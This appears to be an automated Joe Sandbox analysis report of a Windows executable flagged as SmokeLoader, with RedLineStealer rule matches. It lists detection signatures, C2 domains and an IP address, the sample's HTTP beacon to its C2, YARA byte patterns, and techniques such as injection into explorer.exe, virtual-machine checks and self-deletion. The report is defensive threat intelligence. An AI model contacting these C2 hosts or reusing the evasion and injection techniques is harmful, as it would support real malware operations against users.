Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:800803
MD5:04a988e37b8ea5facd28a7d42764f597
SHA1:1182f9d0de33e9363c7777f3f76d26c179a856e6
SHA256:7b734abb20157ca48892547a61f80013138e9659b0942895991a9ab49fdadf79
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found evaded block containing many API calls
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5856 cmdline: C:\Users\user\Desktop\file.exe MD5: 04A988E37B8EA5FACD28A7D42764F597)
    • file.exe (PID: 1720 cmdline: C:\Users\user\Desktop\file.exe MD5: 04A988E37B8EA5FACD28A7D42764F597)
      • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • vhefigi (PID: 4520 cmdline: C:\Users\user\AppData\Roaming\vhefigi MD5: 04A988E37B8EA5FACD28A7D42764F597)
    • vhefigi (PID: 4556 cmdline: C:\Users\user\AppData\Roaming\vhefigi MD5: 04A988E37B8EA5FACD28A7D42764F597)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x60a4:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      0.2.file.exe.5815a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        11.2.vhefigi.7d15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          12.2.vhefigi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            1.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeReversingLabs: Detection: 46%
              Source: file.exeVirustotal: Detection: 35%Perma Link
              Source: http://host-host-file8.com/URL Reputation: Label: malware
              Source: host-file-host6.comVirustotal: Detection: 17%Perma Link
              Source: host-host-file8.comVirustotal: Detection: 17%Perma Link
              Source: C:\Users\user\AppData\Roaming\vhefigiReversingLabs: Detection: 46%
              Source: C:\Users\user\AppData\Roaming\vhefigiVirustotal: Detection: 35%Perma Link
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\vhefigiJoe Sandbox ML: detected
              Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: C:\bonibewejed-jubezilopezibi\bun.pdb source: file.exe, vhefigi.2.dr
              Source: Binary string: C:\bonibewejed-jubezilopezibi\bun.pdbx source: file.exe, vhefigi.2.dr

              Networking

              barindex
              Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
              Source: C:\Windows\explorer.exeNetwork Connect: 185.246.221.63 80Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
              Source: Malware configuration extractorURLs: http://host-file-host6.com/
              Source: Malware configuration extractorURLs: http://host-host-file8.com/
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: Joe Sandbox ViewIP Address: 185.246.221.63 185.246.221.63
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uclahet.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-file-host6.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uclahet.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: host-file-host6.com
              Source: unknownDNS traffic detected: queries for: host-file-host6.com

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 0.2.file.exe.5815a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.vhefigi.7d15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.vhefigi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: vhefigi, 0000000B.00000002.387737312.00000000008BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000001.00000002.318591413.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000B.00000002.387762045.00000000008C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000001.00000002.318398880.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000C.00000002.398871259.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.270582685.00000000005B6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 0000000C.00000002.398929809.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041546C0_2_0041546C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4130_2_0040B413
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411D600_2_00411D60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E310_2_00413E31
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412EE00_2_00412EE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004122A40_2_004122A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004127E80_2_004127E8
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040B9DC appears 35 times
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_0040180C Sleep,NtTerminateProcess,12_2_0040180C
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_00401818 Sleep,NtTerminateProcess,12_2_00401818
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_00401822 Sleep,NtTerminateProcess,12_2_00401822
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_00401826 Sleep,NtTerminateProcess,12_2_00401826
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_00401834 Sleep,NtTerminateProcess,12_2_00401834
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeReversingLabs: Detection: 46%
              Source: file.exeVirustotal: Detection: 35%
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi
              Source: C:\Users\user\AppData\Roaming\vhefigiProcess created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigi
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiProcess created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigiJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32Jump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/2
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 11_2_008CC0D2 CreateToolhelp32Snapshot,Module32First,11_2_008CC0D2
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\bonibewejed-jubezilopezibi\bun.pdb source: file.exe, vhefigi.2.dr
              Source: Binary string: C:\bonibewejed-jubezilopezibi\bun.pdbx source: file.exe, vhefigi.2.dr

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\vhefigiUnpacked PE file: 12.2.vhefigi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BA21 push ecx; ret 0_2_0040BA34
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406EB0 push eax; ret 0_2_00406ECE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 11_2_008CCFD0 push ebx; iretd 11_2_008CD010
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 11_2_008CCFE5 push ebx; iretd 11_2_008CD010
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 11_2_008D1E71 pushad ; iretd 11_2_008D1E77
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_004011D0 push ebx; iretd 12_2_00401217
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_004011D7 push ebx; iretd 12_2_00401217
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 12_2_004011EB push ebx; iretd 12_2_00401217
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004046F6 LoadLibraryA,GetProcAddress,VirtualProtect,0_2_004046F6
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vhefigiJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vhefigiJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vhefigi:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\explorer.exe TID: 5944Thread sleep count: 389 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1316Thread sleep count: 340 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1316Thread sleep time: -34000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 5924Thread sleep count: 203 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 3588Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 1012Thread sleep count: 487 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1200Thread sleep count: 253 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1184Thread sleep count: 129 > 30Jump to behavior
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-8599
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 389Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 487Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858Jump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-8677
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: explorer.exe, 00000002.00000000.305414665.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000002.00000000.305414665.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
              Source: explorer.exe, 00000002.00000000.288276761.0000000005FAA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.305414665.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.286848877.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.305414665.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
              Source: explorer.exe, 00000002.00000000.286848877.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040689F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040689F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004046F6 LoadLibraryA,GetProcAddress,VirtualProtect,0_2_004046F6
              Source: C:\Users\user\AppData\Roaming\vhefigiCode function: 11_2_008CB9AF push dword ptr fs:[00000030h]11_2_008CB9AF
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040689F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040689F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CAD1 SetUnhandledExceptionFilter,0_2_0040CAD1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040730B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040730B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041030E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_0041030E

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: vhefigi.2.drJump to dropped file
              Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
              Source: C:\Windows\explorer.exeNetwork Connect: 185.246.221.63 80Jump to behavior
              Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
              Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 4501930Jump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiThread created: unknown EIP: 4581930Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vhefigiProcess created: C:\Users\user\AppData\Roaming\vhefigi C:\Users\user\AppData\Roaming\vhefigiJump to behavior
              Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.286308744.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.305414665.0000000007B83000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000000.281790475.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.281543571.00000000004C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
